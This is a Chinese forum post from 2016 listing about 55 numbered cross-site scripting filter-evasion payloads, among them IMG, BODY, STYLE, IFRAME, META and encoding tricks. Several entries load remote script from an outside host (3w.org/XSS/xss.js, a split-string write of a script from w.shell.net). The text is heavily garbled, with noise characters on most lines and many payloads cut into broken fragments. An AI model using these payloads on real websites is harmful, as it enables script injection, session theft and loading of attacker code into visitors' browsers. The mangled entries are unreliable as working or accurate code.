(1)普通的XSS JavaScript注入+ c* E. k- f4 @6 _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 H' b8 p5 z7 P6 i, O3 g2 Q
(99)另类弹框1 A: r o+ ~7 N
<q/oncut=alert()>1" G# P! L& _& `' o6 F
<s/onclick=alert()>b& F, @) m5 ~, w
<XSS=" onclick="alert(1)//">clickme</SSX="># g" \6 K7 J& Y% a9 P
<zzz onclick=alert`1`>clickme</zzz>
" E% K+ ]1 [4 C <a onclick=alert`1`>clickme</a>1 K; S3 d9 o$ a5 p: \& S/ X! z
<a=">clickme</a=">
1 K9 B* A0 [ t C0 j2 F% q<a=">clickme</a>
2 Q" l# G6 b. Y' S<z=">clickme</z=">
' X8 f5 C# U1 q! i<z onclick=alert`1`>clickme</z>
' |6 K5 @! o% t$ G
6 U+ t2 r; N! p" [(2)IMG标签XSS使用JavaScript命令; K8 o- q( m" |& g: _2 c" n. p& B4 R) @, `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# }( D' J8 ^) O- W/ N6 r
: E! x/ p! i0 \# O4 ]6 R B(3)IMG标签无分号无引号
% K$ y. D7 L: B<IMG SRC=javascript:alert(‘XSS’)>* Q* H4 m3 M' S9 b
7 Z: h2 k" Q* |+ ]% o9 a4 i, Z$ W
(4)IMG标签大小写不敏感
; j y- H# M1 c9 N h$ N<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 U6 V u; X- ^
0 ?- m# k/ M! ?. e; h8 E(5)HTML编码(必须有分号)8 [& k/ \. V4 m) w" I
<IMG SRC=javascript:alert(“XSS”)>
. y& ?% o; T! Y/ ?
- ]0 o8 l* E, X& w5 N4 n, A# K(6)修正缺陷IMG标签
/ M1 x( I* M. f( H4 }6 K/ e- R! D A<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
W f* J% m3 ?; N$ z3 z/ c+ @( A9 M1 M) A! f
(7)formCharCode标签(计算器)0 G8 s: I/ X) S
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% v" U( K% V! S, R, v
* U+ G( _8 F- g8 ]9 s2 f+ H' V4 ?
(8)UTF-8的Unicode编码(计算器)) ]2 E( F [; P/ s/ m: U9 g
<IMG SRC=jav..省略..S')>8 Y( S( K( n ~! D3 K# S
$ R- h5 ]5 A! @! Z) a; T1 e(9)7位的UTF-8的Unicode编码是没有分号的(计算器): h9 e, q/ r& d m- R+ Q
<IMG SRC=jav..省略..S')>
7 \; Y0 h5 E% |2 J$ Q8 b8 I8 C( q
# N4 Q- D6 b5 R. \; |4 _# u(10)十六进制编码也是没有分号(计算器)
) E/ W- d) t& j3 X<IMG SRC=\'#\'" /span>3 Z: o d5 V9 S9 h [7 H
$ o' _; e, x8 h
(11)嵌入式标签,将Javascript分开
3 V F2 U; B! e3 i3 J<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- C) x5 b( [* n0 ^
$ ]2 b ]8 D7 c8 z: q(12)嵌入式编码标签,将Javascript分开
+ R2 f& k% u- N+ k5 h9 _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: H# W8 ?$ ^ x! v. S7 M
% h, b/ m: U, p+ l& ]# I" K(13)嵌入式换行符. t( u/ j' Q8 T" U- l
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: |/ w8 z( [2 t; y" C& h
/ M2 J, p* u0 Z8 k& j
(14)嵌入式回车+ K( w! x& q( u( r& j
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 N/ u. y* z. g! i- c( D
6 _- }! }- w* {& f: i+ c) `* i8 M" x(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 T% A' T; c' i/ J
<IMG SRC=\'#\'" /span>' B* ^4 w8 ]4 L3 n' ^
6 J2 A% C0 L( o" N
(16)解决限制字符(要求同页面)
! H" ~4 [+ a3 V3 b: f' J<script>z=’document.’</script>
1 v) K' `: i: Y/ E( f7 W<script>z=z+’write(“‘</script>3 d w+ a4 H% q. r4 a
<script>z=z+’<script’</script>: J2 ^9 d! h# P& @
<script>z=z+’ src=ht’</script>
* j( U8 U0 p7 \, X7 \<script>z=z+’tp://ww’</script>
. _( `- f! H* o5 M3 x2 Z4 ]<script>z=z+’w.shell’</script>2 d6 m; W! F0 ~1 _
<script>z=z+’.net/1.’</script>
0 h3 }! H0 w& Q9 M, o. m<script>z=z+’js></sc’</script>9 f# d& ^: {" B) y% P
<script>z=z+’ript>”)’</script>
: p/ @4 w. S( i* R( N<script>eval_r(z)</script># x0 g+ m5 e ^
# J- o" ~: H% E/ Y# p$ v% Q
(17)空字符
8 G0 t1 Z) f# Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 z/ ]$ f. u& {7 k% o
( J7 _$ V% s; D; S* V4 i(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) c& A5 H( |. ?( [ xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. a: C+ C/ o3 s! Z
+ }+ W# @% G( x" ?9 i! f. C {! L8 [) [(19)Spaces和meta前的IMG标签5 ^: ^3 r5 A; K7 E8 J
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
' x( R( F! ~) s# _2 L+ `. y: P/ ^
(20)Non-alpha-non-digit XSS( _3 Y4 p4 d7 P% c {" n
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 \6 h2 w- I$ P8 s) C: F: e, L
9 V7 {3 G- v) O; D" R4 ?6 }(21)Non-alpha-non-digit XSS to 2
7 \' J6 J9 X# {+ y; l- \% O<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. g. _0 @9 `9 K; h+ [* @
$ v- Q# E5 m$ K(22)Non-alpha-non-digit XSS to 3
9 `% V- X3 C% ^6 u9 ~& p% |0 Z/ V8 O<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
0 z1 J( m: q+ ?, G9 r$ J' u
* A# l# C7 I% Z0 C+ y1 {/ J(23)双开括号3 M$ o0 W7 b) q, a" Z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
' @8 M: w6 B1 P2 b; Q
6 f" c( G: R! L* E6 }! k(24)无结束脚本标记(仅火狐等浏览器)# J& Q$ U) ~! p/ a. ^" }2 [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% J+ x& b4 q, p0 e
) E/ ^% f: R7 C1 Z1 `# X
(25)无结束脚本标记29 P" C8 e3 m% S! z) @3 g
<SCRIPT SRC=//3w.org/XSS/xss.js>
/ \( E* @! Y) Y! f3 y
& C" |3 H8 c9 [: `- ?' C( K4 v(26)半开的HTML/JavaScript XSS
: [7 T' E5 A1 V2 \8 E3 P6 u- Q& d$ S<IMG SRC=\'#\'" /span>$ H6 e6 W, K5 t
& K# l* q; [+ m6 [) d# Z2 g
(27)双开角括号
# R& E4 ]$ [- X% M/ [6 J<iframe src=http://3w.org/XSS.html <
, H# {- b% @# Q8 b, E
) _2 k* Z/ J3 n(28)无单引号 双引号 分号& m* j1 v1 ~& r! [# J% \
<SCRIPT>a=/XSS/- V6 [ L' u9 Y J- Y( P" S2 x/ v
alert(a.source)</SCRIPT>" ~) l5 K, m" r2 b6 K0 a, _
! d3 q# A+ d$ J( F! ?6 a5 b D(29)换码过滤的JavaScript
( ~# ] Z* n; Z\”;alert(‘XSS’);//( f @" w9 Q; h: ?, K; q# ?. [) B" C6 T
8 d; f+ l; z# A5 O( M% {2 s
(30)结束Title标签9 A2 w. q5 ~! D* j! p" y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& r, \- n( l, c. y
2 F2 V9 h8 K* ]% g" _, ]6 F(31)Input Image
% x9 o/ n5 q" P2 T<INPUT SRC=\'#\'" /span>
+ H* W z! W [& K: u- C; Z- G, j5 \1 I% |) Q; U) }; K. O" O( ^
(32)BODY Image; z+ ~9 ?- X( Z" @
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 z0 d! U \/ M; G
5 {2 A% N* l2 U(33)BODY标签
. B$ z( T% y/ o. }% r<BODY(‘XSS’)>; f* u7 `9 h$ F3 a) Y0 c; V
* K# Z0 @; z2 }
(34)IMG Dynsrc3 d8 q; S' d5 O
<IMG DYNSRC=\'#\'" /span>
# u& `* b, ^% q" T3 @
+ S9 c8 u, D2 M% |0 G* i(35)IMG Lowsrc) x6 w* P. m M. Y1 s4 H
<IMG LOWSRC=\'#\'" /span>
; _" p+ N& E2 L2 R; b6 w0 ^: G8 V
) b0 g) t! F) }, P0 V6 U(36)BGSOUND
( D5 n, b7 G4 j1 ~2 b, M! H<BGSOUND SRC=\'#\'" /span>0 A' r' b; t1 d8 Z
) N( o! t6 m, D H3 `- V; a(37)STYLE sheet
S7 N& p+ \0 R6 p9 C<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' U2 @/ z( M1 b8 G
, k) Q" K+ u+ O- d(38)远程样式表: _' [" V* a3 p& Q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 u3 \ U7 N" ^+ w/ b9 J5 Z
: y; I3 ?+ b, ~6 _. Q" ^
(39)List-style-image(列表式)
% b3 ?, K8 W9 x) B4 O9 o<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS/ {- H" s8 e4 K: o
: \4 z, \; [ E9 z2 m(40)IMG VBscript$ z6 @1 a+ v- S
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
0 | I, g [: ~/ i" F" ^
" n5 X8 `# N7 I$ V( W5 k(41)META链接url
" h5 u0 J8 |8 E5 S7 t<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>( V* ?# E+ i+ R, E. r, j$ q, Z
9 z0 H* A0 l. a$ f; q1 r! b0 t
(42)Iframe
" M! P R0 o; D# }3 K3 ^2 Y<IFRAME SRC=\'#\'" /IFRAME>+ A- a. _! N" ~. \2 |* y( R
3 N) K4 N3 |7 @% i f(43)Frame# [$ _3 H! t1 r' q/ ^
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
/ @6 K$ a' B9 A! P8 w3 D# J8 P4 U0 n0 s# ]% B
(44)Table: k- X, `. V! [6 {
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>4 [: R# Y7 w- q7 P+ X/ z9 i, c' K
* Y5 Y6 w- r. P' e5 h& W: V(45)TD- t( J2 O% u, D- h: W
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 V: u, }& ?4 ` P! \8 O7 c, B' }$ d
+ I. {( I& A! i2 q5 d; R+ y& z(46)DIV background-image+ G' ^+ U& \8 F/ O4 r; O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! L, s: @4 b: S c/ h- t( |' W7 F5 Q8 g
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)8 l6 f1 x; O8 V( U' A- F
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>0 z: |( T( F9 r5 t. B! `& X7 k- N
& Z* K9 d' ~& {# S( w! u7 ](48)DIV expression7 q' l6 F! N) c
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, Q0 K4 `% r: k! Y2 C# Q7 E! t4 C6 a. ?( N+ [
(49)STYLE属性分拆表达1 W4 O( C! U, `2 N+ k6 n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 ]4 Y5 o6 {0 e4 W7 ~5 S8 J
9 n) {# J4 C3 ?. U(50)匿名STYLE(组成:开角号和一个字母开头)
1 N7 q( v2 U! c, t. w+ Y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" z6 Z% X4 t; |; l; N" N/ Y0 n1 J9 G
$ @3 p5 A9 |9 j1 q" t; h0 E- n
(51)STYLE background-image
2 a' W1 ?4 \- A7 F% V<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 b* D0 u, \+ x+ ]) W
. s' P8 _) [, m& [' G8 k# Z! P(52)IMG STYLE方式
) R* p& t. A; p& @3 h$ {exppression(alert(“XSS”))’>
; n) \! A( X1 [! [" _$ w- v+ l- R1 w0 b
(53)STYLE background5 I% q! x2 D# Z5 J, \
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 R5 I( S1 ?* i6 ^2 ]
% r0 a) C6 ]! Q, u& t' f% z. L& {(54)BASE
$ Q* O$ [6 c! m( j' W9 I<BASE HREF=”javascript:alert(‘XSS’);//”>2 b, o( @! ?/ e+ C! G
; V" Y) R6 M2 X/ d; W3 v(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' b( D7 v5 a" h) w* l<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
0 {% \' l/ `- p% _5 i# N |
发表于 2016-4-28 10:06:15
收藏
支持
反对